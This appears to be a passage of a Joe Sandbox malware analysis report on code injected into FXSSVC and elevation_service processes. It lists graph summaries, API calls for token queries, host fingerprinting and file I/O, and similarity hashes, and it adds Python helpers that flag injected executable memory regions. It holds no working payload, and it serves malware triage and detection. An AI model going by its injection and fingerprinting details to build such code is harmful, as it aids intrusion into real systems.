Total number of Limit Nodes: 5
[Execution graph image not rendered in text; node and edge data omitted. API nodes present in the graph data: CreateThread, VirtualAlloc, VirtualFree, GetUserNameW, CloseHandle, GetTokenInformation.]

Control-flow Graph
[Graph image not rendered in text; legend: Executed / Not Executed. Function starting at 4252a0; no named API nodes in the graph data. Basic-block and edge data omitted.]
APIs
• GetSystemDefaultLangID.KERNELBASE ref: 004253C4
Memory Dump Source
• Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0
• Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction ID: 8a47e9f39304677f409a971bb96fb7c9d418da6cf03e87db8a3d5177a89a8352
• Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction Fuzzy Hash: AE41C65170DEB58FD726922474643B2ABA09B123E2FD914D7D882C72E2D1BC4C42972F

Control-flow Graph
[Graph image not rendered in text; legend: Executed / Not Executed. Function starting at 428070; API nodes in graph: CloseHandle, GetTokenInformation. Basic-block and edge data omitted.]
Memory Dump Source
• Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
• Instruction ID: 062cdad09a1dccd1c9da8856a9db376d4008f753bad528dba163b59ddf6dad7d
• Opcode Fuzzy Hash: 4e190fe7d4b3c5e57d75e6528bbdfe52906c1a61a35aefbd00297ac479a6f7d8
• Instruction Fuzzy Hash: 1061FF3070FA748FD7658B28B81423E7AA0BB65350FD9429F9446C22E1CF2C5C1A836F

Control-flow Graph
[Graph image not rendered in text; legend: Executed / Not Executed. Function starting at 440080; API nodes in graph: VirtualFree, GetUserNameW. Basic-block and edge data omitted.]
Memory Dump Source
• Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
• Instruction ID: 8005e838d64804137fa67e69ec8fa3b052c9f4a58d823fee826107e1ad4b30cf
                                                                                                                                                                      • Opcode Fuzzy Hash: a53a589e1d79c8daebd35e0be32d5c07406a5a25e6b1b8ac5d66ad9906a0b4eb
                                                                                                                                                                      • Instruction Fuzzy Hash: FED14931418F0D8BE724EF58D8457EAB7D1FBA0310F18461FDA46C3264DA78DA658AC7

Control-flow Graph
[Control-flow graph node/edge data omitted; first listed block 425910-425968; no Windows API calls labelled in the graph]
Memory Dump Source
• Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
• Instruction ID: 7bb32e801b6acd29df5aac314cfd129283357f91862d4bb627c80d1fd3c86720
• Opcode Fuzzy Hash: 61e7e04614083fc9a4d415ed1ed9d586c41edeef07ca5b9990f411115d9a6df2
• Instruction Fuzzy Hash: 4CF1372071CE588FD669A72D68513BB73D2E799314F58429FE04AC3396DE3C9C46838E

Control-flow Graph
[Control-flow graph node/edge data omitted; first listed block 425b42-425b47; API calls labelled in the graph: CreateThread (425ccf-425ce4)]
Memory Dump Source
• Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction ID: 49779e34ee639fb0c6bc4d66a31d1c2f9eb687a124b737a2bb5394a8c50f85d2
• Opcode Fuzzy Hash: 2ff8010c23fac40248132f603dcb160a69be8753e27de13806aa853a5623418f
• Instruction Fuzzy Hash: 3121D33031CF608FCB699B1AB4487762AE1AB55350FE841A78447CF396EA3CDC45971E

Control-flow Graph
[Control-flow graph node/edge data omitted; first listed block 425b09-425d01; API calls labelled in the graph: CreateThread (425bb4-425ce4)]
Memory Dump Source
• Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction ID: b7e3d5331c1304632278862209979492ce980127c8a9cafc856ea49140661027
• Opcode Fuzzy Hash: 355f5de826a502d2b078035f50b0d1b19bc6bd6d86d359f9387c1ff3fa9cfd06
• Instruction Fuzzy Hash: 2801D23031DF768FDB555624BC1837A7B90EB50324FE501AB8487CA295EABC4902A70F

Control-flow Graph
[Control-flow graph node/edge data omitted; first listed block 425b87-425b99; API calls labelled in the graph: CreateThread (425b87-425b99), CreateThread (425bb4-425ce4)]
APIs
Memory Dump Source
• Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
Similarity
• API ID: CreateThread
• String ID:
• API String ID: 2422867632-0
• Opcode ID: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction ID: ca3ff88ea219f5825eb3369ad7927bf15066a86b53b2dd921e3d9a1caa2db0f4
• Opcode Fuzzy Hash: a986bd5c00f5553bdb8598d00602888b78738e64b994e3da4fa4453f2922062f
• Instruction Fuzzy Hash: 21E0863070DB544FDB599B2468103193EE5EB88310F5502CFC44ADB2D5DB7D1A06878B

Control-flow Graph
[Control-flow graph node/edge data omitted; first listed block 42599b-42599e; no Windows API calls labelled in the graph]
APIs
Memory Dump Source
• Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
Similarity
• API ID: wcscpy
• String ID:
• API String ID: 1284135714-0
• Opcode ID: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction ID: 9f62b6bf6e1d1a510953f0bb591694cce4ae617f0899bc194266652dda0e6c9a
• Opcode Fuzzy Hash: 51412a402b8cd50030cf07c80cfd4b00c1a38cf92c70ea7e66de183ec09a8362
• Instruction Fuzzy Hash: 300126F0B1EEB0CFD61BE718700227A6152B795334FE8419B904AC7292C83C4D82938F

Control-flow Graph
[Control-flow graph node/edge data omitted; first listed block 428090-428096; API calls labelled in the graph: CloseHandle (428186), GetTokenInformation (4280ca-42810f), GetTokenInformation (4281fe-428201)]
APIs
Memory Dump Source
• Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction ID: 7a56fbfbeaf37c7a3436b851283f21cc1175aee4b15bc53802576e08adf2423e
• Opcode Fuzzy Hash: 618394ff9deb9f6b5e010b5aaee4db8be701b981e1d63e6b3fb36a727850c086
• Instruction Fuzzy Hash: 1BC08C7033B87A96B23802483C0B0BE66408202351BCC000F8C02C23E0DD0C8E73109F

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
Control-flow graph: function at 0x42817f (FXSSVC, injected region 0x420000). The raw node/edge listing is not reproduced; what it records is: 63 basic blocks spanning 0x428077-0x428335; Win32 calls CloseHandle (0x428186) and GetTokenInformation (0x4280ca, 0x4281fe); internal calls to 0x45715c, 0x457164, 0x425d90 (three call sites), 0x42ec00 and 0x441280.
APIs
Memory Dump Source
• Source File: 00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp, Offset: 00420000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_17_2_420000_FXSSVC.jbxd
Similarity
• API ID: CloseHandle
• String ID:
• API String ID: 2962429428-0
• Opcode ID: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction ID: 10b65ee38fa1589f91d027178714526807b1d27bab61ba9775247bb161552a60
• Opcode Fuzzy Hash: a0153765961d18982154f5649a6418830ea2767f573826a199b39b51e69f8ae7
• Instruction Fuzzy Hash: 7BC048A076B52986A13826883C0A4BAA5908612761F88441BAD068B3E2D95C4DA351AE
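The dotted fields of the Source File name above encode the dumped region: the first three fields and the base address reappear in the Snapshot File name (0x11 = process 17, phase 2, base 0x420000), and the remaining three fields read naturally as the raw Protect/State/Type values of a MEMORY_BASIC_INFORMATION record (0x40 = PAGE_EXECUTE_READWRITE, 0x1000 = MEM_COMMIT, 0x20000 = MEM_PRIVATE). The Python below is an added example, not part of the Joe Sandbox report or its tooling: it decodes those fields and applies the check a triager wants on such a dump, whether the region is committed, private (not backed by an image) and executable, which together with "based on PE: false" is the profile of injected or unpacked code. The field layout and the MEMORY_BASIC_INFORMATION reading are assumptions inferred from the values on this page; the PAGE_* and MEM_* constants are the documented Win32 ones.

```python
"""Decode Joe Sandbox '.sdmp' memory-dump file names and flag regions that
look like injected/unpacked code.

ASSUMPTION (inferred from the report, not documented): the name is
  <process index>.<phase>.<sequence>.<base>.<protect>.<state>.<type>.<flags>.sdmp
with protect/state/type holding raw MEMORY_BASIC_INFORMATION values.
"""
import re

# Documented Win32 memory constants (winnt.h)
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = 0x10 | 0x20 | 0x40 | 0x80
WRITABLE = 0x04 | 0x08 | 0x40 | 0x80
PAGE_GUARD, PAGE_NOCACHE, PAGE_WRITECOMBINE = 0x100, 0x200, 0x400
MEM_COMMIT, MEM_RESERVE, MEM_FREE = 0x1000, 0x2000, 0x10000
MEM_PRIVATE, MEM_MAPPED, MEM_IMAGE = 0x20000, 0x40000, 0x1000000
MEM_TYPE = {MEM_PRIVATE: "MEM_PRIVATE", MEM_MAPPED: "MEM_MAPPED", MEM_IMAGE: "MEM_IMAGE"}

SDMP_RE = re.compile(
    r"^([0-9a-f]{8})\.([0-9a-f]{8})\.([0-9a-f]+)\.([0-9a-f]{16})"
    r"\.([0-9a-f]{8})\.([0-9a-f]{8})\.([0-9a-f]{8})\.([0-9a-f]{8})\.sdmp$", re.I)


def parse_sdmp_name(name):
    """Split an .sdmp file name into its fields (ints; 'sequence' kept opaque)."""
    m = SDMP_RE.match(name)
    if m is None:
        raise ValueError(f"not a Joe Sandbox sdmp name: {name!r}")
    pidx, phase, seq, base, prot, state, typ, flags = m.groups()
    return {
        "process_index": int(pidx, 16), "phase": int(phase, 16), "sequence": seq,
        "base": int(base, 16), "protect": int(prot, 16), "state": int(state, 16),
        "type": int(typ, 16), "flags": int(flags, 16),
    }


def protect_name(protect):
    """Human-readable protection, e.g. 0x40 -> 'PAGE_EXECUTE_READWRITE'."""
    base = PAGE_PROTECT.get(protect & 0xFF, f"0x{protect & 0xFF:x}")
    mods = [n for bit, n in ((PAGE_GUARD, "PAGE_GUARD"), (PAGE_NOCACHE, "PAGE_NOCACHE"),
                             (PAGE_WRITECOMBINE, "PAGE_WRITECOMBINE")) if protect & bit]
    return "|".join([base] + mods)


def is_rwx(info):
    return bool(info["protect"] & EXECUTABLE) and bool(info["protect"] & WRITABLE)


def looks_injected(info):
    """Committed, private (not an image or file mapping) and executable: the
    profile of shellcode or an unpacked payload written into a process.
    An RWX region (see is_rwx) is the strongest variant of this."""
    return (info["state"] == MEM_COMMIT
            and info["type"] == MEM_PRIVATE
            and bool(info["protect"] & EXECUTABLE))


def snapshot_name(info, process_name):
    """Rebuild the matching IDA-plugin snapshot name used in the report
    (hcaresult_<process index>_<phase>_<base>_<process>.jbxd). The
    correspondence is observed on this page, not documented."""
    return f"hcaresult_{info['process_index']}_{info['phase']}_{info['base']:x}_{process_name}.jbxd"


def triage(name, process_name):
    info = parse_sdmp_name(name)
    return {
        "snapshot": snapshot_name(info, process_name),
        "base": f"0x{info['base']:x}",
        "protect": protect_name(info["protect"]),
        "type": MEM_TYPE.get(info["type"], f"0x{info['type']:x}"),
        "committed": info["state"] == MEM_COMMIT,
        "rwx": is_rwx(info),
        "injected_code_candidate": looks_injected(info),
    }


if __name__ == "__main__":
    # The two dump names that appear in this report section.
    for name, proc in (
        ("00000011.00000002.1409368401.0000000000420000.00000040.00001000.00020000.00000000.sdmp", "FXSSVC"),
        ("00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp", "elevation_service"),
    ):
        print(triage(name, proc))
```

Both dumps on this page come out as committed, private, RWX regions in a process that is not the original sample, which is what the "Injects a PE file into a foreign processes" and "Allocates memory in foreign processes" signatures describe; an image-backed RX region (MEM_IMAGE, PAGE_EXECUTE_READ) is the normal case and is not flagged.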

Execution Graph

Execution Coverage: 8.1%
Dynamic/Decrypted Code Coverage: 99.2%
Signature Coverage: 0%
Total number of Nodes: 240
Total number of Limit Nodes: 29

Execution graph for the injected region at 0x890000 in elevation_service. The raw node/edge listing is not reproduced; the API call sites it records are:
• CreateThread: 0x895b87, 0x895cdf (with edges on to 0x895810 and 0x8954a0)
• GetTokenInformation: 0x8980ca, 0x8981ad; CloseHandle: 0x898186 (all inside the routine entered at 0x898070/0x898075, which is reached from 0x89810e, 0x898090, 0x8981b1 and 0x895c7b)
• GetComputerNameW: 0x8b03e0, 0x8b04d6; GetUserNameW: 0x8b03bf; VirtualFree: 0x8b0181 (routine at 0x8b0080, five API calls in total)
• GetSystemDefaultLangID: 0x8953c4 (reached from 0x8952a0, 0x8952b7, 0x8952f4 and 0x895347)
• VirtualAlloc: 0x89e0d8 (via 0x89e050, 0x8a52c0 and 0x8b3870); VirtualFree: 0x899169, 0x899508, 0x899d73, 0x89cc97
• ReadFile: 0x896103, 0x8993dd, 0x89a697, 0x89aa64; WriteFile: 0x8989d7, 0x89a43c, 0x89ca8e, 0x89d25c
• SetFilePointerEx: 0x896123, 0x8987c6, 0x898da5, 0x899019, 0x89973c, 0x89a5ba, 0x89a6af, 0x89d225
• wcscat: 0x898348, 0x8994ca, 0x899521 (the last together with the CRT symbol __free_lconv_mon)
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e6ace8c27580d51c4d6788a91f16e1abf6f92432227aa06c17b5d7ed2c99a3de
• Instruction ID: 378f2796b32eb08d801488e2b7f4dcc0232d3ae6142785d79dddcd81370c7609
• Opcode Fuzzy Hash: e6ace8c27580d51c4d6788a91f16e1abf6f92432227aa06c17b5d7ed2c99a3de
• Instruction Fuzzy Hash: 95726932528E0E8BCB2CAF589C476B4B6D1F795310F9C836FD846C33A6DE78954586C2
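Joe Sandbox exports each execution graph and control-flow graph as one flat token stream: node declarations of the form `<id> <address>[-<end>] [<API name> ...] [call <address> ...]`, edges of the form `<id>-><id>`, and on some execution-graph nodes the annotation `<n> API calls`. The Python below is an added example, not part of the report or of Joe Sandbox: a parser for that stream plus a per-root summary of which Win32/CRT APIs each entry node reaches, which is the quickest way to reduce a 240-node graph to the "token query, host fingerprint, file I/O" reading a triager wants. The format description is inferred from the graphs on this page, not from documentation, and the sample inputs are constructed excerpts of those graphs (the control-flow excerpt drops most blocks and adds one edge, 614->633, so that it stays connected).

```python
"""Parse the flat graph serialization Joe Sandbox uses for 'execution_graph'
and 'control_flow_graph' sections and summarise the APIs each root reaches.

Format (inferred from the report, not documented):
  <id> <addr>[-<end>] [<API name> ...] [call <addr> ...]   node declaration
  <id>-><id>                                               edge
  <n> API calls                                            annotation (execution graph)
"""
import re
from collections import deque
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

ADDR_RE = re.compile(r"^([0-9a-f]+)(?:-([0-9a-f]+))?$", re.I)


@dataclass
class Node:
    nid: int
    start: int                      # block / function start address
    end: Optional[int] = None       # end of a basic-block range, if given
    apis: List[str] = field(default_factory=list)   # Win32/CRT names on the node
    calls: List[int] = field(default_factory=list)  # 'call <addr>' targets


def parse_graph(text: str) -> Tuple[Dict[int, Node], List[Tuple[int, int]]]:
    """Return ({id: Node}, [(src_id, dst_id), ...]) for one graph token stream."""
    toks = text.split()
    if toks and toks[0] in ("control_flow_graph", "execution_graph"):
        toks = toks[1:]
    nodes: Dict[int, Node] = {}
    edges: List[Tuple[int, int]] = []
    cur: Optional[Node] = None
    i = 0
    while i < len(toks):
        tok = toks[i]
        if "->" in tok:                                   # edge
            src, dst = tok.split("->", 1)
            edges.append((int(src), int(dst)))
            i += 1
        elif tok.isdigit() and toks[i + 1:i + 3] == ["API", "calls"]:
            i += 3                                        # '<n> API calls' annotation
        elif tok.isdigit():                               # '<id> <addr>' starts a node
            m = ADDR_RE.match(toks[i + 1]) if i + 1 < len(toks) else None
            if m is None:
                raise ValueError(f"node {tok}: missing or bad address")
            cur = Node(int(tok), int(m.group(1), 16),
                       int(m.group(2), 16) if m.group(2) else None)
            nodes[cur.nid] = cur
            i += 2
        elif tok == "call":                               # internal callee
            if cur is None:
                raise ValueError("'call' before any node")
            cur.calls.append(int(toks[i + 1], 16))
            i += 2
        else:                                             # API / CRT symbol name
            if cur is None:
                raise ValueError(f"symbol {tok!r} before any node")
            cur.apis.append(tok)
            i += 1
    return nodes, edges


def reachable_apis(nodes, edges, root: int):
    """Breadth-first walk from `root`, collecting every API name on the way."""
    succ: Dict[int, List[int]] = {}
    for s, d in edges:
        succ.setdefault(s, []).append(d)
    seen, queue, apis = {root}, deque([root]), set()
    while queue:
        n = queue.popleft()
        if n in nodes:
            apis.update(nodes[n].apis)
        for d in succ.get(n, ()):
            if d not in seen:
                seen.add(d)
                queue.append(d)
    return apis


def roots(nodes, edges):
    """Nodes with no incoming edge: function entries in the execution graph."""
    targets = {d for _, d in edges}
    return [nid for nid in nodes if nid not in targets]


def summarize(text: str):
    """{root address (hex): sorted APIs reachable from it}."""
    nodes, edges = parse_graph(text)
    return {f"{nodes[r].start:x}": sorted(reachable_apis(nodes, edges, r))
            for r in roots(nodes, edges)}


# Constructed excerpt of the execution graph on this page (three roots kept).
EXEC_SAMPLE = (
    "execution_graph 10681 895b09 10682 895b16 10681->10682 10683 895cdf CreateThread "
    "10682->10683 10684 895c01 10682->10684 10683->10682 10683->10684 10685 8954a0 "
    "10683->10685 10684->10684 10693 89810e 10696 898075 10693->10696 10698 8980a7 "
    "10693->10698 10694 898186 CloseHandle 10694->10696 10695 8980ca GetTokenInformation "
    "10695->10696 10696->10694 10696->10695 10697 8981ad GetTokenInformation 10696->10697 "
    "10696->10698 10697->10696 10603 899a29 10604 8999ea 10603->10604 "
    "10605 89cdd0 2 API calls 10604->10605"
)
# Constructed excerpt of the 0x42817f control-flow graph: most blocks dropped,
# edge 614->633 added so the excerpt stays connected.
CFG_SAMPLE = (
    "control_flow_graph 611 42817f 612 428184 611->612 613 428186 CloseHandle 612->613 "
    "614 42818c-428192 612->614 613->614 633 4281d7-4281e6 call 45715c 614->633 "
    "654 4280ca-42810f GetTokenInformation 633->654"
)

if __name__ == "__main__":
    print(summarize(EXEC_SAMPLE))
    print(summarize(CFG_SAMPLE))
```

Feeding the page's full execution graph to `summarize` groups the 240 nodes by entry function, and the same walk over a control-flow graph yields the block ranges and `call` targets needed to match one dump's routine against another (the token-query routine here sits at offset 0x8070 in both the 0x420000 and 0x890000 regions).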
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f314e44e71bfe467635a20a0ad728ef6200802aa520895d640594c65b3759962
• Instruction ID: 435514f7062a52ec1645c59b3fa99eadc6aa448b01a22f1a42f6dd23a23a02b0
• Opcode Fuzzy Hash: f314e44e71bfe467635a20a0ad728ef6200802aa520895d640594c65b3759962
• Instruction Fuzzy Hash: FE02052170CB4C4FCB69AB2C58552FA7BD1FB9A324F5841AEE04BC7396DD258C06C386

Control-flow Graph

Control-flow graph: function at 0x8952a0 (elevation_service, injected region 0x890000). The raw node/edge listing is not reproduced; what it records is: 37 basic blocks spanning 0x8952a0-0x89547b plus one detached block at 0x8d0d4c-0x8d0d4e; a single Win32 call, GetSystemDefaultLangID (block 0x8953c4-0x8953ca); no internal calls.
APIs
• GetSystemDefaultLangID.KERNELBASE ref: 008953C4
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: DefaultLangSystem
• String ID:
• API String ID: 706401283-0
• Opcode ID: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction ID: 2a6c15edf7c8c9812c0b5dac075b320166582ad0e518f84b31c7f152f2ccffc6
• Opcode Fuzzy Hash: be85cc28eff309c6b04ec446b1d1922c7f56a33d23bc4027ac3bc4e0d37bd274
• Instruction Fuzzy Hash: B441E59150DE998FDF27736448642707BA0FB233E6F9D04D7D487CB2E2E1984C81A76A
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 32a1346f689ca69e6c1817ad9c6502fc2abb1573d67bc5450444cb3875e0a70e
• Instruction ID: 3b66abf7a193348aae3283a1fdeb68d7413b3dd9fbdace022b799ca7d4290d60
• Opcode Fuzzy Hash: 32a1346f689ca69e6c1817ad9c6502fc2abb1573d67bc5450444cb3875e0a70e
• Instruction Fuzzy Hash: EFD1393051CB48CFDF3AAB2C94516B67BA0FB66328F2C059ED087C7662DA298C41D353

Control-flow Graph

Control-flow graph: function at 0x8b0080 (elevation_service, injected region 0x890000). The raw node/edge listing is not reproduced; what it records is: 57 basic blocks spanning 0x8b0080-0x8b05d9 plus one block at 0x8bb1ee-0x8bb49f; Win32 calls GetComputerNameW (blocks 0x8b0458-0x8b0472 and 0x8b04cc-0x8b04e6, the latter right after a call to 0x8c9970), GetUserNameW (0x8b03bf) and VirtualFree (0x8b0181); internal calls to 0x89e050 (twice in one block), 0x8c7164, 0x8c715c and 0x8c9970.
APIs
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: ComputerName
• String ID:
• API String ID: 3545744682-0
• Opcode ID: aae9ce643ec60b6bbaf6f3d4054fc9884d16932a80ec6400ece074ac0af679f5
• Instruction ID: 10862f6c7573f2bb94b889e2e11751930e7895474883e20c8d50b6159cd23d34
• Opcode Fuzzy Hash: aae9ce643ec60b6bbaf6f3d4054fc9884d16932a80ec6400ece074ac0af679f5
• Instruction Fuzzy Hash: E5D1F231418F0D8BCB28EF58D8497EBB7E1FBA0314F18461FD846C7265DA74DA498AC2

Control-flow Graph

Control-flow graph: function at 0x898070 (elevation_service, injected region 0x890000). The raw node/edge listing is not reproduced; what it records is: 72 basic blocks spanning 0x898070-0x898335; Win32 calls CloseHandle (0x898186) and GetTokenInformation (0x8980ca, 0x8981fe); internal calls to 0x8c7164, 0x8c715c, 0x895d90 (three call sites), 0x89ec00 and 0x8b1280. The call sites and callees lie at the same offsets from the region base as those of the 0x42817f routine in the FXSSVC dump (region 0x420000) above.
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5fb13a04a7e6046ff5e94998b1f76451cb875e9ea96bffb944b4f01765a37091
• Instruction ID: 50381fc56232b9b84b3b167dc1d46417445747ac318a92d7b92f80656cb7360f
• Opcode Fuzzy Hash: 5fb13a04a7e6046ff5e94998b1f76451cb875e9ea96bffb944b4f01765a37091
• Instruction Fuzzy Hash: 2A61FF3160CE4BDFCF65BB6888186357AA0FB57354F6C025AE447C32A1DF349C499752
APIs
• SetFilePointerEx.KERNELBASE ref: 008987C9
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: adbb1face1e5ee7e72f77b9d0f087f771b3fd543e3cc8a97d35552ba232f820e
• Instruction ID: 556a2fb10f1d8b52bc976f5df5dc464e9d1dd412a230197cbe1585497102d1bc
• Opcode Fuzzy Hash: adbb1face1e5ee7e72f77b9d0f087f771b3fd543e3cc8a97d35552ba232f820e
• Instruction Fuzzy Hash: 8351B23050C78ACFDF65AB689811375BBE1FB93318F2C46ABD096D7192DE358C468712

Control-flow Graph
• Function at 0x8960f0; graph nodes call SetFilePointerEx and ReadFile (graph rendering not reproduced in text)
APIs
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
• Opcode ID: cbc2541052c6c4d3f878d336b734c4f9e798dc65864beb8e7fadeedf304e376e
• Instruction ID: 297df88ce19e60d71aaa68cb9d3437032f9b0a194aa32be2f4d0e0fd77f873b2
• Opcode Fuzzy Hash: cbc2541052c6c4d3f878d336b734c4f9e798dc65864beb8e7fadeedf304e376e
• Instruction Fuzzy Hash: 6821332020C64E8EDF697A289844B3A3A65FB91328F2D416FD447C2147FA29CC36A342

Control-flow Graph
• Function at 0x89cdd0; graph nodes call SetFilePointerEx and WriteFile (graph rendering not reproduced in text)
APIs
• SetFilePointerEx.KERNELBASE(?,00000000,?,?,00000000,?,00899B29), ref: 0089D225
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
• Opcode ID: 5d0fc6403e351e815543ce49452ed1ae3c45d62299d52813147e212a4f9c0176
• Instruction ID: 044c4c8477ae4c0738b8f46bb0f3bd1f53e687af74e3f0c8608dd7422b88aeca
• Opcode Fuzzy Hash: 5d0fc6403e351e815543ce49452ed1ae3c45d62299d52813147e212a4f9c0176
• Instruction Fuzzy Hash: 9AF02222A4C309EEBE3D3348FC0A9763668F652734B2C029BF157E0413A896BC06512D

Control-flow Graph
• Function at 0x895910; graph nodes contain only internal calls, no Windows API calls (graph rendering not reproduced in text)
Memory Dump Source
• Source File: 00000012.00000002.2631731824.0000000000890000.00000040.00001000.00020000.00000000.sdmp, Offset: 00890000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_18_2_890000_elevation_service.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 384e8f61db65d166d8c02f0d5f1707aca12a4f3125dfee385905d896a56423d5
• Instruction ID: 4e0866edc23fb9f6775eb0b4f66c61101d2e65ceca0e8b619865e3fba4522355
• Opcode Fuzzy Hash: 384e8f61db65d166d8c02f0d5f1707aca12a4f3125dfee385905d896a56423d5
• Instruction Fuzzy Hash: 41F14A2071CE4C8FDB6AA71C68553FA77D1F79A324F58019EE08BC7396DD249C068786

Control-flow Graph
• Function at 0x89a39d; graph nodes call SetFilePointerEx (graph rendering not reproduced in text)
APIs
• SetFilePointerEx.KERNELBASE ref: 0089A5C0
Memory Dump Source
